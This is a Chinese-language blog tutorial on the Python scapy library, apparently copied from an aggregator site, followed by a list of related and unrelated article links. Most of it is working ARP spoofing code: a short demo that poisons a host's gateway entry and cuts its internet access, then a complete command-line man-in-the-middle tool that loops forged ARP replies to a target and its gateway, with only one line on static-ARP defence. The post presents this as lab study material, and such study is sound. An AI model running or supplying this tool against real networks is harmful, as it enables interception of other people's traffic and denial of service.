scapy 是 python 写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 —— 由方石剑分享

scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

scapy的安装在Linux非常便利,但在Windows下比较复杂。

以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。

scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:

sudo pip3 install scapy-python3

以下是一个非常简单的arp攻击演示脚本,该脚本可以在实验环境下帮助你理解arp协议的作用和原理,当然你甚至可以扩充该脚本去编写一个完整的arp攻击工具。

#!/usr/bin/python3

# -*- coding: utf-8 -*-

# ARP攻击演示脚本/arpDemo.py

from scapy.all import (

    Ether,

    ARP,

    sendp

)

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# Ether用来构建以太网数据包

eth = Ether()

arp = ARP(

    # 代表ARP请求或者响应

    op="is-at",

    # 发送方Mac地址/毒化记录中的MAC

    hwsrc="08:00:27:97:d1:f5",

    # 发送方IP地址/毒化记录中的IP

    psrc="192.168.31.1",

    # 目标Mac地址/被欺骗主机MAC

    hwdst="2C:56:DC:D3:AB:DB",

    # 目标IP地址/被欺骗主机IP地址

    pdst="192.168.31.248"

    # 意思就是告诉192.168.31.248这个地址的主机,IP为192.168.31.100的主机MAC地址是08:00:27:97:d1:f5

    # 如果不写目标主机的IP和MAC则默认以广播的形式发送

)

# scapy重载了"/"操作符,可以用来表示两个协议层的组合

# 这里我们输出一下数据包的结构信息

print((eth/arp).show())

# 发送封包,并且每间隔1秒重复发送

sendp(eth/arp, inter=2, loop=1)

攻击前我们在主机上看一下arp缓存的记录

arp -a

攻击前的arp缓存记录

执行脚本:

sudo python3 arpDemo.py

攻击后的arp缓存记录

这里我们是对主机的网关记录进行篡改,在执行了攻击脚本后主机已经无法正常访问互联网了。

如果你要防范这种攻击也很简单,直接将IP和MAC地址的关系绑定写入arp缓存即可。
在windows你可以通过arp命令完成,Linux下与此操作相似。

#添加静态项

arp -s 192.168.31.1   64-09-80-04-aa-c3

下面是一个更加复杂的中间人攻击脚本范例
你可以进一步的去完善它

#!/usr/bin/python3

# -*- coding: utf-8 -*-

'''

ARP 攻击脚本

'''

import argparse

import threading

import time

from scapy.all import ARP, Ether, get_if_hwaddr, sendp

from scapy.layers.l2 import getmacbyip

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# getmacbyip方法用于通过ip获取mac地址

# get_if_hwaddr方法获取指定网卡的mac地址

def get_mac(tgt_ip):

    '''

    调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。

    '''

    tgt_mac = getmacbyip(tgt_ip)

    if tgt_mac is not None:

        return tgt_mac

    else:

        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活"%tgt_ip)

def create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip):

    '''

    生成ARP数据包,伪造网关欺骗目标计算机

    src_mac:本机的MAC地址,充当中间人

    tgt_mac:目标计算机的MAC

    gateway_ip:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击

    tgt_ip:目标计算机的IP

    op=is-at,表示ARP响应

    '''

    eth = Ether(src=src_mac, dst=tgt_mac)

    arp = ARP(hwsrc=src_mac, psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at")

    pkt = eth / arp

    return pkt

def create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip):

    '''

    生成ARP数据包,伪造目标计算机欺骗网关

    src_mac:本机的MAC地址,充当中间人

    gateway_mac:网关的MAC

    tgt_ip:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击

    gateway_ip:网关的IP

    op=is-at,表示ARP响应

    '''

    eth = Ether(src=src_mac, dst=gateway_mac)

    arp = ARP(hwsrc=src_mac, psrc=tgt_ip, hwdst=gateway_mac, pdst=gateway_ip, op="is-at")

    pkt = eth / arp

    return pkt

def main():

    """

    主方法

    """

    description = "ARP攻击脚本"

    parser = argparse.ArgumentParser(description=description)

    parser.add_argument('-sm', dest='srcmac', type=str, help='发送源计算机的MAC,如果不提供,默认将采用本机的MAC地址')

    parser.add_argument('-t', dest='targetip', type=str, help='指定目标计算机IP', required=True)

    parser.add_argument('-tm', dest='targetmac', type=str, help='指定目标计算机MAC,如果不提供,默认将根据其IP获取MAC地址')

    parser.add_argument('-g', dest='gatewayip', type=str, help='指定网关IP', required=True)

    parser.add_argument('-gm', dest='gatewaymac', type=str, help='指定网关MAC,如果不提供,默认将根据其IP获取MAC地址')

    parser.add_argument('-i', dest='interface', type=str, help='指定使用的网卡', required=True)

    parser.add_argument('-a', dest='allarp', action='store_true', help='是否进行全网arp欺骗')

    args = parser.parse_args()

    tgt_ip = args.targetip

    gateway_ip = args.gatewayip

    interface = args.interface

    srcmac = args.srcmac

    targetmac = args.targetmac

    gatewaymac = args.gatewaymac

    if tgt_ip is None or gateway_ip is None or interface is None:

        print(parser.print_help())

        exit(0)

    src_mac = srcmac

    if src_mac is None:

        src_mac = get_if_hwaddr(interface)

    print('本机MAC地址是:', src_mac)

    print("目标计算机IP地址是:", tgt_ip)

    tgt_mac = targetmac

    if tgt_mac is None:

        tgt_mac = get_mac(tgt_ip)

    print("目标计算机MAC地址是:", tgt_mac)

    print("网关IP地址是:", gateway_ip)

    gateway_mac = gatewaymac

    if gateway_mac is None:

        gateway_mac = get_mac(gateway_ip)

    print("网关MAC地址是:", gateway_mac)

    input('按任意键继续:')

    pkt_station = create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip)

    pkt_gateway = create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip)

    # 如果不展示发送情况的话下面的语句可以更加简便直接用sendp方法提供的功能循环发送即可,不需要多线程和死循环。

    # sendp(pkt_station, inter=1, loop=1)

    # sendp(pkt_gateway, inter=1, loop=1)

    i = 1

    while True:

        t = threading.Thread(

            target=sendp,

            args=(pkt_station,),

            kwargs={'inter':1, 'iface':interface}

        )

        t.start()

        t.join()

        print(str(i) + " [*]发送一个计算机ARP欺骗包")

        s = threading.Thread(

            target=sendp,

            args=(pkt_gateway,),

            kwargs={'inter':1, 'iface':interface}

        )

        s.start()

        s.join()

        print(str(i) + " [*]发送一个网关ARP欺骗包")

        i += 1

        time.sleep(1)

if __name__ == '__main__':

    main()

Python scapy 实现一个简易 arp 攻击脚本的更多相关文章

  1. python scapy的用法之ARP主机扫描和ARP欺骗

    python scapy的用法之ARP主机扫描和ARP欺骗 目录: 1.scapy介绍 2.安装scapy 3.scapy常用 4.ARP主机扫描 5.ARP欺骗 一.scapy介绍 scapy是一个 ...

  2. Python Django 编写一个简易的后台管理工具4-添加admin模版

    导入admin后台模版 可以在网上任意搜索模版,我这里也提供一个地址github 拷贝admin后台的html文件至项目的templates文件夹 创建static文件夹,将admin后台的js,im ...

  3. Python之实现一个简易计算器

    自己动手写计算器 一.功能分析 用户输入一个类似这样 3*( 4+ 50 )-(( 100 + 40 )*5/2- 3*2* 2/4+9)*((( 3 + 4)-4)-4) 这样的表达式,假设表达式里 ...

  4. python之做一个简易的翻译器(二)

    把写好的python程序转换为windows系统下可以运行的exe文件 使用pyinstaller命令来进行转换 1.首先安装pyinstaller 可以在pycharm中安装,也可以直接使用pip命 ...

  5. python之做一个简易的翻译器(一)

    平时经常在网上翻译一些单词,突发奇想,可不可以直接调某些免费翻译网站的接口呢?然后做一个图形界面的翻译小工具?下面开始实践 1.先找一下有哪些免费翻译的接口 百度了一下关键字“免费翻译接口”,然后找到 ...

  6. python django搭建一个简易博客的解析(按照文件顺序逐一讲解)

    上次讲解了一下各py文件的内容,但比较乱,所以这次整理了一个顺序版. 源代码请在http://github/Cheng0829/mysite自行下载 mysite: db.sqlite3:数据库文件. ...

  7. Python Django 编写一个简易的后台管理工具1-安装环境

    安装python环境 MAC 一般都会自带 Python2.x版本 的环境,你也可以在链接 https://www.python.org/downloads/mac-osx/ 上下载最新版安装. 安装 ...

  8. Python Django 编写一个简易的后台管理工具3-运行项目

    编写view页面 def hello(request): return render(request,'hello.html') 编写html页面 <!DOCTYPE html> < ...

  9. Python Django 编写一个简易的后台管理工具2-创建项目

    django-admin 创建项目 pycharm 创建项目

随机推荐

  1. 微信小程序-----校园头条详细开发之注册登录

    1.注册登录功能的实现 1.1结构 1.2 代码实现 1.2.1  为了通信的安全着想,在此我是通过小程序端获得code,然后传递给后端,在后端向微信后台发送api请求,解密,从而得到用户的唯一标示o ...

  2. Python-S9-Day115——Flask Web框架基础

    01 今日内容概要 02 内容回顾 03 Flask框架:配置文件导入原理 04 Flask框架:配置文件使用 05 Flask框架:路由系统 06 Flask框架:请求和响应相关 07 示例:学生管 ...

  3. c++树及树与二叉树的转换

    此算法中的树结构为“左儿子有兄弟链接结构” 在这样的一个二叉树中,一个节点的左分支是他的大儿子节点,右分支为他的大兄弟节点. 这里讲的树有递归前根,中根,后根遍历,插入节点,插入兄弟节点,查找结点,释 ...

  4. 微信Oauth2.0网页开放授权

    网页授权获取用户基本信息 如果用户在微信中(Web微信除外)访问公众号的第三方网页,公众号开发者可以通过此接口获取当前用户基本信息(包括昵称.性别.城市.国家).利用用户信息,可以实现体验优化.用户来 ...

  5. Android EditText默认不弹出输入法,以及获取光标,修改输入法Enter键的方法

    一.Android EditText默认不弹出输入法的办法:1. 在AndroidManifest.xml中将需要默认隐藏键盘的Activity中添加属性即可(常用此方法) android:windo ...

  6. 节点流——FileReaderWriter

    import java.io.File; import java.io.FileNotFoundException; import java.io.FileReader; import java.io ...

  7. 挑战程序竞赛例题 4.1 Random Walk(高斯消元求期望值)

    给你一幅N*M的地图,地图中有不能到达的障碍物'#'与可以走的点'.',从(1,1)开始走到(N,M),其中每一次走动均等概率地向周围的可达的格子走去,求到达(N,M)的期望步数.(N,M<=1 ...

  8. [SDOI2010][bzoj1927] 星际竞速 [最小路径覆盖+费用流]

    题面 传送门 思路 仔细观察题目要求的东西,发现就是求一个最小路径覆盖,只不过可以跳跃(就是那个鬼畜的超级跳跃) 那么就直接上最小路径覆盖模版 对每个点,拆成两个点$X_i$和$Y_i$,建立超级源超 ...

  9. SpringBoot中使用RestTemplate

    spring框架提供的RestTemplate类可用于在应用中调用rest服务,它简化了与http服务的通信方式,统一了RESTful的标准,封装了http链接, 我们只需要传入url及返回值类型即可 ...

  10. 在LINQ TO SQL 中使用MVC3中的DataAnnotations 【MetadataType】

    原文发布时间为:2011-04-07 -- 来源于本人的百度文章 [由搬家工具导入] http://stackoverflow.com/questions/1535662/asp-net-mvc-li ...